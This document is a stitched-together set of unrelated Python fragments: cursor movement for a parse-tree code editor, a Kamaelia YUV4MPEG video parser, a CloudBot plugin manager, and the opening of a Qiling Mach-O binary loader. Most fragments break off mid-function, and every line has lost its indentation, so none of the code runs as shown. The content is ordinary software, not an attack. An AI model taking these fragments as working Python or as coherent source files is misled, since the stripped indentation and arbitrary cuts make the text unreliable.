self.node = node
self.pos = len(node.symbol.name)
if self.pos > 1 and (not node.image or node.plain_mode):
self.pos -= 1
else:
# if neighbouring node is BOS, stay in box
if type(node.previous_terminal()) is BOS:
self.node = node.previous_terminal()
self.pos = 0
return
node = self.find_previous_visible(node)
self.node = node
self.pos = len(node.symbol.name)
def right(self):
node = self.node
if not self.is_visible(node):
node = self.find_next_visible(self.node)
if type(node.symbol) is MagicTerminal:
node = node.symbol.ast.children[0]
if isinstance(node, EOS):
return
if not node is self.node:
self.node = node
self.pos = 0
if node.symbol.name == "\r":
self.line += 1
if self.pos < len(node.symbol.name):
self.pos += 1
else:
node = self.find_next_visible(node)
if node.symbol.name == "\r":
self.line += 1
if isinstance(node, EOS):
self.node = self.find_previous_visible(node)
self.pos = len(self.node.symbol.name)
return
if type(node.symbol) is MagicTerminal:
node = node.symbol.ast.children[0]
node = self.find_next_visible(node)
self.node = node
self.pos = 1
if node.image and not node.plain_mode:
self.pos = len(node.symbol.name)
def jump_to(self, other):
"""Apply other attributes to self.
This ensures that the history is not lost.
`self.cursor = other.copy()` becomes
`self.cursor.jump_to(other)`.
"""
self.node = other.node
self.pos = other.pos
self.line = other.line
def jump_left(self):
if self.node.symbol.name == "\r":
self.line -= 1
self.node = self.find_previous_visible(self.node)
self.pos = len(self.node.symbol.name)
def jump_right(self):
node = self.find_next_visible(self.node)
if self.inside() or isinstance(node, EOS):
self.pos = len(self.node.symbol.name)
return
self.node = node
self.pos = len(self.node.symbol.name)
if node.symbol.name == "\r":
self.line += 1
def find_next_visible(self, node):
"""Returns the next visible node in the parse tree.
Skips over invisible nodes like IndentationTerminals and crosses
languagebox boundaries.
"""
if self.is_visible(node) or isinstance(node.symbol, MagicTerminal):
node = node.next_terminal()
while not self.is_visible(node):
if isinstance(node, EOS):
# Leave language box
root = node.get_root()
lbox = root.get_magicterminal()
if lbox:
node = lbox.next_terminal()
continue
else:
return node
elif isinstance(node.symbol, MagicTerminal):
# Enter language box
node = node.symbol.ast.children[0]
continue
elif isinstance(node, MultiTextNode):
node = node.children[0]
continue
node = node.next_terminal()
return node
def find_previous_visible(self, node, cross_lang=True):
"""Return the previous visible node in the parse tree."""
if self.is_visible(node):
if type(node.symbol) is MagicTerminal and cross_lang:
node = node.symbol.ast.children[-1]
else:
node = node.previous_terminal()
while True:
if isinstance(node, BOS):
if not cross_lang: # don't cross language border
return node
# leave lbox
root = node.get_root()
lbox = root.get_magicterminal()
if lbox:
node = lbox.previous_terminal()
continue
else:
return node
elif isinstance(node.symbol, MagicTerminal):
node = node.symbol.ast.children[-1]
continue
elif isinstance(node, MultiTextNode):
node = node.children[-1]
continue
if self.is_visible(node):
break
node = node.previous_terminal()
return node
def is_visible(self, node):
"""Checks whether a given node is visible in the source code view."""
if isinstance(node.symbol, IndentationTerminal):
return False
if isinstance(node, BOS):
return False
if isinstance(node, EOS):
return False
if isinstance(node.symbol, MultiTextNode):
return False
return True
def up(self):
"""Move the cursor a line up."""
if self.line > 0:
x = self.get_x()
self.line -= 1
self.move_to_x(x)
def down(self):
"""Move the cursor a line down."""
if self.line < len(self.lines) - 1:
x = self.get_x()
self.line += 1
self.move_to_x(x)
def home(self):
"""Jump to the beginning of the current line."""
self.node = self.lines[self.line].node
self.pos = len(self.node.symbol.name)
def end(self):
"""Jump to the end of the current line."""
if self.line < len(self.lines)-1:
self.node = self.find_previous_visible(self.lines[self.line+1].node)
else:
while not isinstance(self.node, EOS):
self.node = self.node.next_terminal()
self.node = self.find_previous_visible(self.node)
self.pos = len(self.node.symbol.name)
def move_to_x(self, x):
"""Jump to the x-th character/column position in the current line."""
node = self.lines[self.line].node
while x > 0:
newnode = self.find_next_visible(node)
if newnode is node:
self.node = node
self.pos = len(node.symbol.name)
return
node = newnode
if type(node.symbol) is MagicTerminal:
node = node.symbol.ast.children[0]
continue
if node.image and not node.plain_mode:
x -= self.get_nodesize_in_chars(node).w
else:
x -= len(node.symbol.name)
if node.symbol.name == "\r":
self.node = self.find_previous_visible(node)
self.pos = len(self.node.symbol.name)
return
if isinstance(node, EOS):
root = node.get_root()
lbox = root.get_magicterminal()
if lbox:
node = lbox
continue
else:
self.node = self.find_previous_visible(node)
self.pos = len(self.node.symbol.name)
return
self.pos = len(node.symbol.name) + x
self.node = node
def get_x(self):
"""Get the current character/column position of the cursor."""
if self.node.symbol.name == "\r":
return 0
if isinstance(self.node, BOS):
if not self.node.get_root().get_magicterminal():
return 0
if self.node.image and not self.node.plain_mode:
x = self.get_nodesize_in_chars(self.node).w
else:
x = self.pos
node = self.find_previous_visible(self.node)
while node.symbol.name != "\r":
if isinstance(node, BOS):
if not node.get_root().get_magicterminal():
break
if node.image and not node.plain_mode:
x += self.get_nodesize_in_chars(node).w
else:
x += len(node.symbol.name)
node = self.find_previous_visible(node)
return x
def move_to_node(self, node, after=False):
tmp = node
while tmp.symbol.name != "\r" and not isinstance(tmp, BOS):
tmp = self.find_previous_visible(tmp)
line = self.get_line_from_node(tmp)
self.line = line
self.node = node
if after:
self.pos = len(node.symbol.name)
else:
self.node = self.find_previous_visible(node)
self.pos = len(self.node.symbol.name)
def get_line_from_node(self, node):
i = 0
for l in self.lines:
if l.node is node:
return i
i += 1
def get_nodesize_in_chars(self, node):
"""Calculate the size in | |
#!/usr/bin/env python
#
# Copyright (C) 2007 British Broadcasting Corporation and Kamaelia Contributors(1)
# All Rights Reserved.
#
# You may only modify and redistribute this under the terms of any of the
# following licenses(2): Mozilla Public License, V1.1, GNU General
# Public License, V2.0, GNU Lesser General Public License, V2.1
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://kamaelia.sourceforge.net/AUTHORS - please extend this file,
# not this notice.
# (2) Reproduced in the COPYING file, and at:
# http://kamaelia.sourceforge.net/COPYING
# Under section 3.5 of the MPL, we are using this text since we deem the MPL
# notice inappropriate for this file. As per MPL/GPL/LGPL removal of this
# notice is prohibited.
#
# Please contact us via: <EMAIL>
# to discuss alternative licensing.
# -------------------------------------------------------------------------
#
"""\
=============================================
Parsing and Creation of YUV4MPEG format files
=============================================
YUV4MPEGToFrame parses YUV4MPEG format data sent to its "inbox" inbox and sends
video fram data structures to its "outbox" outbox.
FrameToYUV4MPEG does the reverse - taking frame data structures sent to its
"inbox" inbox and outputting YUV4MPEG format data to its "outbox" outbox."
The YUV4MPEG file format is supported by many tools, such as mjpegtools,
mplayer/mencoder, and ffmpeg.
Example Usage
-------------
Playback a YUV4MPEG format file::
Pipeline( RateControlledFileReader("video.yuv4mpeg",readmode="bytes", ...),
YUV4MPEGToFrame(),
VideoOverlay()
).run()
Decode a dirac encoded video file to a YUV4MPEG format file::
Pipeline( RateControlledFileReader("video.dirac",readmode="bytes", ...),
DiracDecoder(),
FrameToYUV4MPEG(),
SimpleFileWriter("output.yuv4mpeg")
).run()
YUV4MPEGToFrame Behaviour
-------------------------
Send binary data as strings containing YUV4MPEG format data to the "inbox" inbox
and frame data structures will be sent out of the "outbox" outbox as soon as
they are parsed.
See below for a description of the uncompressed frame data structure format.
This component supports sending data out of its outbox to a size limited inbox.
If the size limited inbox is full, this component will pause until it is able
to send out the data. Data will not be consumed from the inbox if this component
is waiting to send to the outbox.
If a producerFinished message is received on the "control" inbox, this component
will complete parsing any data pending in its inbox, and finish sending any
resulting data to its outbox. It will then send the producerFinished message on
out of its "signal" outbox and terminate.
If a shutdownMicroprocess message is received on the "control" inbox, this
component will immediately send it on out of its "signal" outbox and immediately
terminate. It will not complete processing, or sending on any pending data.
FrameToYUV4MPEG Behaviour
-------------------------
Send frame data structures to the "inbox" inbox of this component. YUV4MPEG
format binary string data will be sent out of the "outbox" outbox.
See below for a description of the uncompressed frame data structure format.
The header data for the YUV4MPEG file is determined from the first frame.
All frames sent to this component must therefore be in the same pixel format and
size, otherwise the output data will not be valid YUV4MPEG.
This component supports sending data out of its outbox to a size limited inbox.
If the size limited inbox is full, this component will pause until it is able
to send out the data. Data will not be consumed from the inbox if this component
is waiting to send to the outbox.
If a producerFinished message is received on the "control" inbox, this component
will complete parsing any data pending in its inbox, and finish sending any
resulting data to its outbox. It will then send the producerFinished message on
out of its "signal" outbox and terminate.
If a shutdownMicroprocess message is received on the "control" inbox, this
component will immediately send it on out of its "signal" outbox and immediately
terminate. It will not complete processing, or sending on any pending data.
=========================
UNCOMPRESSED FRAME FORMAT
=========================
A frame is a dictionary data structure. It must, at minimum contain the first 3
("yuv", "size" and "pixformat")::
{
"yuv" : (y_data, u_data, v_data) # a tuple of strings
"size" : (width, height) # in pixels
"pixformat" : pixelformat # format of raw video data
"frame_rate" : fps # frames per second
"interlaced" : 0 or not 0 # non-zero if the frame is two interlaced fields
"topfieldfirst" : 0 or not 0 # non-zero the first field comes first in the data
"pixel_aspect" : fraction # aspect ratio of pixels
"sequence_meta" : metadata # string containing extended metadata
# (no whitespace or control characters)
}
All other fields are optional when providing frames to FrameToYUV4MPEG.
YUV4MPEGToFrame only guarantees to fill inthe YUV data itself. All other fields
will be filled in if the relevant header data is detected in the file.
The pixel formats recognised (and therefore supported) are::
"YUV420_planar"
"YUV411_planar"
"YUV422_planar"
"YUV444_planar"
"YUV4444_planar"
"Y_planar"
"""
from Axon.Component import component
#from Axon.Ipc import WaitComplete
from Axon.Ipc import shutdownMicroprocess, producerFinished
from Axon.AxonExceptions import noSpaceInBox
import re
from Kamaelia.Support.Data.Rationals import rational
class YUV4MPEGToFrame(component):
"""\
YUV4MPEGToFrame() -> new YUV4MPEGToFrame component.
Parses YUV4MPEG format binarydata, sent as strings to its "inbox" inbox
and outputs uncompressed video frame data structures to its "outbox" outbox.
"""
def __init__(self):
"""x.__init__(...) initializes x; see x.__class__.__doc__ for signature"""
super(YUV4MPEGToFrame,self).__init__()
self.remainder = ""
self.shutdownMsg = None
def checkShutdown(self):
"""\
Collects any new shutdown messages arriving at the "control" inbox, and
returns "NOW" if immediate shutdown is required, or "WHENEVER" if the
component can shutdown when it has finished processing pending data.
"""
while self.dataReady("control"):
newMsg = self.recv("control")
if isinstance(newMsg, shutdownMicroprocess):
self.shutdownMsg = newMsg
elif self.shutdownMsg is None and isinstance(newMsg, producerFinished):
self.shutdownMsg = newMsg
if isinstance(self.shutdownMsg, shutdownMicroprocess):
return "NOW"
elif self.shutdownMsg is not None:
return "WHENEVER"
else:
return None
def readline(self):
"""\
Generator.
Read up to the next newline char from the stream of chunks of binary
string data arriving at the "inbox" inbox.
Any excess data is placed into self.remainder ready for the next call
to self.readline or self.readbytes.
Data is only read from the inbox when required. It is not preemptively
fetched.
The read data is placed into self.bytesread
If a shutdown is detected, self.bytesread is set to "" and this
generator immediately returns.
"""
bytes = []
newdata = self.remainder
index = newdata.find("\x0a")
while index==-1:
bytes.append(newdata)
while not self.dataReady("inbox"):
if self.checkShutdown():
self.bytesread=""
return
self.pause()
yield 1
newdata = self.recv("inbox")
index = newdata.find("\x0a")
tail = newdata[:index+1]
self.remainder = newdata[index+1:]
bytes.append(tail)
self.bytesread = "".join(bytes)
return
def readbytes(self,size):
"""\
Generator.
Read the specified number of bytes from the stream of chunks of binary
string data arriving at the "inbox" inbox.
Any excess data is placed into self.remainder ready for the next call
to self.readline or self.readbytes.
Data is only read from the inbox when required. It is not preemptively
fetched.
The read data is placed into self.bytesread
If a shutdown is detected, self.bytesread is set to "" and this
generator immediately returns.
"""
buf = [self.remainder]
bufsize = len(self.remainder)
while bufsize < size:
if self.dataReady("inbox"):
newdata = self.recv("inbox")
buf.append(newdata)
bufsize += len(newdata)
shutdown = self.checkShutdown()
if shutdown == "NOW" or (shutdown and not self.dataReady("inbox") and bufsize<size):
self.bytesread=""
return
if bufsize<size and not self.anyReady():
self.pause()
yield 1
excess = bufsize-size
if excess:
wanted = buf[:-1]
tail, self.remainder = buf[-1][:-excess], buf[-1][-excess:]
wanted.append(tail)
else:
wanted = buf
self.remainder = ""
self.bytesread = "".join(wanted)
return
def safesend(self, data, boxname):
"""\
Generator.
Sends data out of the named outbox. If the destination is full
(noSpaceInBox exception) then it waits until there is space and retries
until it succeeds.
If a shutdownMicroprocess message is received, returns early.
"""
while 1:
try:
self.send(data, boxname)
return
except noSpaceInBox:
if self.checkShutdown() == "NOW":
return
self.pause()
yield 1
def main(self):
"""Main loop"""
# parse header
for _ in self.readline(): yield _
if self.checkShutdown() == "NOW" or (self.checkShutdown() and self.bytesread==""):
self.send(self.shutdownMsg,"signal")
return
line = self.bytesread
m = re.match("^YUV4MPEG2((?: .\S*)*)\n$", line)
assert(m)
fields = m.groups()[0]
seq_params = parse_seq_tags(fields)
yield 1
while 1:
for _ in self.readline(): yield _
line = self.bytesread
if self.checkShutdown() == "NOW" or (self.checkShutdown() and self.bytesread==""):
break
m = re.match("^FRAME((?: .\S*)*)\n$", line)
assert(m)
fields = m.groups()[0]
frame_params = parse_frame_tags(fields)
ysize = seq_params["size"][0] * seq_params["size"][1]
csize = seq_params["chroma_size"][0] * seq_params["chroma_size"][1]
for _ in self.readbytes(ysize): yield _
| |
import asyncio
import glob
import importlib
import inspect
import logging
import os
import re
import sys
import time
import sqlalchemy
from cloudbot.event import Event
from cloudbot.util import database
logger = logging.getLogger("cloudbot")
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
def find_hooks(parent, module):
"""
:type parent: Plugin
:type module: object
:rtype: (list[CommandHook], list[RegexHook], list[RawHook], list[SieveHook], List[EventHook], list[OnStartHook])
"""
# set the loaded flag
module._cloudbot_loaded = True
command = []
regex = []
raw = []
sieve = []
event = []
periodic = []
on_start = []
type_lists = {"command": command, "regex": regex, "msg_raw": raw, "sieve": sieve, "event": event,
"periodic": periodic, "on_start": on_start}
for name, func in module.__dict__.items():
if hasattr(func, "_cloudbot_hook"):
# if it has cloudbot hook
func_hooks = func._cloudbot_hook
for hook_type, func_hook in func_hooks.items():
type_lists[hook_type].append(_hook_name_to_plugin[hook_type](parent, func_hook))
# delete the hook to free memory
del func._cloudbot_hook
return command, regex, raw, sieve, event, periodic, on_start
def find_tables(code):
"""
:type code: object
:rtype: list[sqlalchemy.Table]
"""
tables = []
for name, obj in code.__dict__.items():
if isinstance(obj, sqlalchemy.Table) and obj.metadata == database.metadata:
# if it's a Table, and it's using our metadata, append it to the list
tables.append(obj)
return tables
class PluginManager:
"""
PluginManager is the core of CloudBot plugin loading.
PluginManager loads Plugins, and adds their Hooks to easy-access dicts/lists.
Each Plugin represents a file, and loads hooks onto itself using find_hooks.
Plugins are the lowest level of abstraction in this class. There are four different plugin types:
- CommandPlugin is for bot commands
- RawPlugin hooks onto msg_raw lines and are called earlier, for validation purposes
- RegexPlugin loads a regex parameter, and executes on irc lines which match the regex
- SievePlugin is a catch-all sieve, which all other plugins go through before being executed.
:type bot: cloudbot.bot.CloudBot
:type plugins: dict[str, Plugin]
:type commands: dict[str, CommandHook]
:type raw_triggers: dict[str, list[RawHook]]
:type catch_all_triggers: list[RawHook]
:type event_type_hooks: dict[cloudbot.event.EventType, list[EventHook]]
:type regex_hooks: list[(re.__Regex, RegexHook)]
:type sieves: list[SieveHook]
"""
def __init__(self, bot):
"""
Creates a new PluginManager. You generally only need to do this from inside cloudbot.bot.CloudBot
:type bot: cloudbot.bot.CloudBot
"""
self.bot = bot
self.plugins = {}
self.commands = {}
self.raw_triggers = {}
self.catch_all_triggers = []
self.event_type_hooks = {}
self.regex_hooks = []
self.sieves = []
self._hook_waiting_queues = {}
def load_all(self, plugin_dir):
"""
Load a plugin from each *.py file in the given directory.
Won't load any plugins listed in "disabled_plugins".
:type plugin_dir: str
"""
path_list = glob.iglob(os.path.join(plugin_dir, '*.py'))
# Load plugins asynchronously :O
for path in path_list:
self.load_plugin(path)
def load_plugin(self, path):
"""
Loads a plugin from the given path and plugin object, then registers all hooks from that plugin.
Won't load any plugins listed in "disabled_plugins".
:type path: str
"""
file_path = os.path.abspath(path)
file_name = os.path.basename(path)
title = os.path.splitext(file_name)[0]
# if "plugin_loading" in self.bot.config:
# pl = self.bot.config.get("plugin_loading")
#
# if pl.get("use_whitelist", False):
# if title not in pl.get("whitelist", []):
# logger.info('Not loading plugin module "{}": plugin not whitelisted'.format(file_name))
# return
# else:
# if title in pl.get("blacklist", []):
# logger.info('Not loading plugin module "{}": plugin blacklisted'.format(file_name))
# return
# make sure to unload the previously loaded plugin from this path, if it was loaded.
if file_name in self.plugins:
self.unload_plugin(file_path)
module_name = "%s.%s" % (os.path.basename(os.path.dirname(path)), title)
try:
plugin_module = importlib.import_module(module_name)
# if this plugin was loaded before, reload it
if hasattr(plugin_module, "_cloudbot_loaded"):
importlib.reload(plugin_module)
except Exception:
logger.exception("Error loading {}:".format(file_name))
return
# create the plugin
plugin = Plugin(file_path, file_name, title, plugin_module)
# proceed to register hooks
# create database tables
plugin.create_tables(self.bot)
# run on_start hooks
for on_start_hook in plugin.run_on_start:
print(file_name)
success = self.launch(on_start_hook, Event(bot=self.bot, hook=on_start_hook))
if not success:
logger.warning("Not registering hooks from plugin {}: on_start hook errored".format(plugin.title))
# unregister databases
plugin.unregister_tables(self.bot)
return
self.plugins[plugin.file_name] = plugin
for periodic_hook in plugin.periodic:
#self._start_periodic(periodic_hook)
self._log_hook(periodic_hook)
# register commands
for command_hook in plugin.commands:
for alias in command_hook.aliases:
if alias in self.commands:
logger.warning(
"Plugin {} attempted to register command {} which was already registered by {}. "
"Ignoring new assignment.".format(plugin.title, alias, self.commands[alias].plugin.title))
else:
self.commands[alias] = command_hook
self._log_hook(command_hook)
# register raw hooks
for raw_hook in plugin.raw_hooks:
if raw_hook.is_catch_all():
self.catch_all_triggers.append(raw_hook)
else:
for trigger in raw_hook.triggers:
if trigger in self.raw_triggers:
self.raw_triggers[trigger].append(raw_hook)
else:
self.raw_triggers[trigger] = [raw_hook]
self._log_hook(raw_hook)
# register events
for event_hook in plugin.events:
for event_type in event_hook.types:
if event_type in self.event_type_hooks:
self.event_type_hooks[event_type].append(event_hook)
else:
self.event_type_hooks[event_type] = [event_hook]
self._log_hook(event_hook)
# register regexps
for regex_hook in plugin.regexes:
for regex_match in regex_hook.regexes:
self.regex_hooks.append((regex_match, regex_hook))
self._log_hook(regex_hook)
# we don't need this anymore
del plugin.run_on_start
def unload_plugin(self, path):
"""
Unloads the plugin from the given path, unregistering all hooks from the plugin.
Returns True if the plugin was unloaded, False if the plugin wasn't loaded in the first place.
:type path: str
:rtype: bool
"""
file_name = os.path.basename(path)
title = os.path.splitext(file_name)[0]
if "disabled_plugins" in self.bot.config and title in self.bot.config['disabled_plugins']:
# this plugin hasn't been loaded, so no need to unload it
return False
# make sure this plugin is actually loaded
if not file_name in self.plugins:
return False
# get the loaded plugin
plugin = self.plugins[file_name]
# unregister commands
for command_hook in plugin.commands:
for alias in command_hook.aliases:
if alias in self.commands and self.commands[alias] == command_hook:
# we need to make sure that there wasn't a conflict, so we don't delete another plugin's command
del self.commands[alias]
# unregister raw hooks
for raw_hook in plugin.raw_hooks:
if raw_hook.is_catch_all():
self.catch_all_triggers.remove(raw_hook)
else:
for trigger in raw_hook.triggers:
assert trigger in self.raw_triggers # this can't be not true
self.raw_triggers[trigger].remove(raw_hook)
if not self.raw_triggers[trigger]: # if that was the last hook for this trigger
del self.raw_triggers[trigger]
# unregister events
for event_hook in plugin.events:
for event_type in event_hook.types:
assert event_type in self.event_type_hooks # this can't be not true
self.event_type_hooks[event_type].remove(event_hook)
if not self.event_type_hooks[event_type]: # if that was the last hook for this event type
del self.event_type_hooks[event_type]
# unregister regexps
for regex_hook in plugin.regexes:
for regex_match in regex_hook.regexes:
self.regex_hooks.remove((regex_match, regex_hook))
# unregister sieves
for sieve_hook in plugin.sieves:
self.sieves.remove(sieve_hook)
# unregister databases
plugin.unregister_tables(self.bot)
# remove last reference to plugin
del self.plugins[plugin.file_name]
if self.bot.config.get("logging", {}).get("show_plugin_loading", True):
logger.info("Unloaded all plugins from {}.py".format(plugin.title))
return True
def _log_hook(self, hook):
"""
Logs registering a given hook
:type hook: Hook
"""
#if self.bot.config.get("logging", {}).get("show_plugin_loading", True):
logger.info("Loaded {}".format(hook))
logger.debug("Loaded {}".format(repr(hook)))
def _prepare_parameters(self, hook, event):
"""
Prepares arguments for the given hook
:type hook: cloudbot.plugin.Hook
:type event: cloudbot.event.Event
:rtype: list
"""
parameters = []
for required_arg in hook.required_args:
if hasattr(event, required_arg):
value = getattr(event, required_arg)
parameters.append(value)
else:
logger.error("Plugin {} asked for invalid argument '{}', cancelling execution!"
.format(hook.description, required_arg))
logger.debug("Valid arguments are: {} ({})".format(dir(event), event))
return None
return parameters
def _execute_hook_threaded(self, hook, event):
"""
:type hook: Hook
:type event: cloudbot.event.Event
"""
event.prepare_threaded()
parameters = self._prepare_parameters(hook, event)
if parameters is None:
return None
try:
return hook.function(*parameters)
finally:
event.close_threaded()
def _execute_hook_sync(self, hook, event):
"""
:type hook: Hook
:type event: cloudbot.event.Event
"""
event.prepare()
parameters = self._prepare_parameters(hook, event)
if parameters is None:
return None
try:
return hook.function(*parameters)
finally:
event.close()
def _execute_hook(self, hook, event):
"""
Runs the specific hook with the given bot and event.
Returns False if the hook errored, True otherwise.
:type hook: cloudbot.plugin.Hook
:type event: cloudbot.event.Event
:rtype: bool
"""
out = self._execute_hook_sync(hook, event)
if out is not None:
if isinstance(out, (list, tuple)):
# if there are multiple items in the response, return them on multiple lines
event.reply(*out)
else:
event.reply(*str(out).split('\n'))
return True
@asyncio.coroutine
def _sieve(self, sieve, event, hook):
"""
:type sieve: cloudbot.plugin.Hook
:type event: cloudbot.event.Event
:type hook: cloudbot.plugin.Hook
:rtype: cloudbot.event.Event
"""
try:
if sieve.threaded:
result = yield from self.bot.loop.run_in_executor(None, sieve.function, self.bot, event, hook)
else:
result = yield from sieve.function(self.bot, event, hook)
except Exception:
logger.exception("Error running sieve {} on {}:".format(sieve.description, hook.description))
return None
else:
return result
def _start_periodic(self, hook):
interval = hook.interval
initial_interval = hook.initial_interval
yield from asyncio.sleep(initial_interval)
while True:
event = Event(bot=self.bot, hook=hook)
yield from self.launch(hook, event)
yield from asyncio.sleep(interval)
def launch(self, hook, event):
"""
Dispatch a given event to a given hook using a given bot object.
Returns False if the hook didn't run successfully, and True if it ran successfully.
:type event: cloudbot.event.Event | cloudbot.event.CommandEvent
:type hook: cloudbot.plugin.Hook | cloudbot.plugin.CommandHook
:rtype: bool
"""
#if hook.type == "command" and hook.auto_help and not event.text and hook.doc is not None:
#event.notice_doc()
#return False
| |
#!/usr/bin/env python3
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#
import os, plistlib, struct
from .loader import QlLoader
from qiling.exception import *
from qiling.const import *
from .macho_parser.parser import *
from .macho_parser.const import *
from .macho_parser.utils import *
from qiling.os.macos.kernel_api.hook import *
from qiling.os.memory import QlMemoryHeap
from qiling.os.macos.const import *
from qiling.os.macos.task import MachoTask
from qiling.os.macos.kernel_func import FileSystem, map_commpage
from qiling.os.macos.mach_port import MachPort, MachPortManager
from qiling.os.macos.subsystems import MachHostServer, MachTaskServer
from qiling.os.macos.utils import env_dict_to_array, page_align_end
from qiling.os.macos.thread import QlMachoThreadManagement, QlMachoThread
# commpage is a shared mem space which is in a static address
def load_commpage(ql):
if ql.archtype == QL_ARCH.X8664:
COMM_PAGE_START_ADDRESS = X8664_COMM_PAGE_START_ADDRESS
else:
COMM_PAGE_START_ADDRESS = ARM64_COMM_PAGE_START_ADDRESS
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_SIGNATURE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CPU_CAPABILITIES64, b'\x00\x00\x00\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_UNUSED, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_VERSION, b'\x0d')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CPU_CAPABILITIES, b'\x00\x00\x00\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NCPUS, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_UNUSED0, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CACHE_LINESIZE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_SCHED_GEN, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_MEMORY_PRESSURE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_SPIN_COUNT, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_ACTIVE_CPUS, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_PHYSICAL_CPUS, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_LOGICAL_CPUS, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_UNUSED1, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_MEMORY_SIZE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CPUFAMILY, b'\xec\x5e\x3b\x57')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_KDEBUG_ENABLE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_ATM_DIAGNOSTIC_CONFIG, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_UNUSED2, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_TIME_DATA_START, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_TSC_BASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_SCALE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_SHIFT, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_NS_BASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_NT_GENERATION, b'\x01') # someflag seem important
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_GTOD_GENERATION, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_GTOD_NS_BASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_GTOD_SEC_BASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_APPROX_TIME, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_APPROX_TIME_SUPPORTED, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_CONT_TIMEBASE, b'\x00')
ql.mem.write(COMM_PAGE_START_ADDRESS + COMM_PAGE_BOOTTIME_USEC, b'\x00')
class QlLoaderMACHO(QlLoader):
# macho x8664 loader
def __init__(self, ql, dyld_path=None):
super(QlLoaderMACHO, self).__init__(ql)
self.dyld_path = dyld_path
self.ql = ql
#FIXME: Demigod needs a better way to handle kext file
if os.path.isdir(self.ql.argv[0]):
basename = os.path.basename(self.ql.argv[0])
self.kext_name = os.path.splitext(basename)[0]
filename = self.ql.argv
self.ql._argv = [self.ql.argv[0] + "/Contents/MacOS/" + self.kext_name]
self.ql._path = self.ql.argv[0]
self.plist = plistlib.load(open(filename[0] + "/Contents/Info.plist", "rb"))
if "IOKitPersonalities" in self.plist:
self.IOKit = True
else:
self.IOKit = False
else:
self.kext_name = None
def run(self):
self.profile = self.ql.profile
stack_address = int(self.profile.get("OS64", "stack_address"), 16)
stack_size = int(self.profile.get("OS64", "stack_size"), 16)
vmmap_trap_address = int(self.profile.get("OS64", "vmmap_trap_address"), 16)
self.heap_address = int(self.profile.get("OS64", "heap_address"), 16)
self.heap_size = int(self.profile.get("OS64", "heap_size"), 16)
self.stack_address = stack_address
self.stack_size = stack_size
if self.ql.code:
self.ql.mem.map(self.ql.os.entry_point, self.ql.os.code_ram_size, info="[shellcode_stack]")
self.ql.os.entry_point = (self.ql.os.entry_point + 0x200000 - 0x1000)
self.ql.mem.write(self.entry_point, self.ql.code)
self.ql.reg.arch_sp = self.ql.os.entry_point
return
self.ql.os.macho_task = MachoTask()
self.ql.os.macho_fs = FileSystem(self.ql)
self.ql.os.macho_mach_port = MachPort(2187)
self.ql.os.macho_port_manager = MachPortManager(self.ql, self.ql.os.macho_mach_port)
self.ql.os.macho_host_server = MachHostServer(self.ql)
self.ql.os.macho_task_server = MachTaskServer(self.ql)
self.envs = env_dict_to_array(self.env)
self.apples = self.ql.os.path.transform_to_relative_path(self.ql.path)
self.ql.os.heap = QlMemoryHeap(self.ql, self.heap_address, self.heap_address + self.heap_size)
# FIXME: Not working due to overlarge mapping, need to fix it
# vm_shared_region_enter(self.ql)
map_commpage(self.ql)
self.ql.os.thread_management = QlMachoThreadManagement(self.ql)
self.ql.os.macho_thread = QlMachoThread(self.ql)
self.ql.os.thread_management.cur_thread = self.ql.os.macho_thread
self.ql.os.macho_vmmap_end = vmmap_trap_address
self.stack_sp = stack_address + stack_size
self.macho_file = MachoParser(self.ql, self.ql.path)
self.is_driver = (self.macho_file.header.file_type == 0xb)
self.loading_file = self.macho_file
self.slide = int(self.profile.get("LOADER", "slide"), 16)
self.dyld_slide = int(self.profile.get("LOADER", "dyld_slide"), 16)
self.string_align = 8
self.ptr_align = 8
self.binary_entry = 0x0
self.proc_entry = 0x0
self.argvs = [self.ql.path]
self.argc = 1
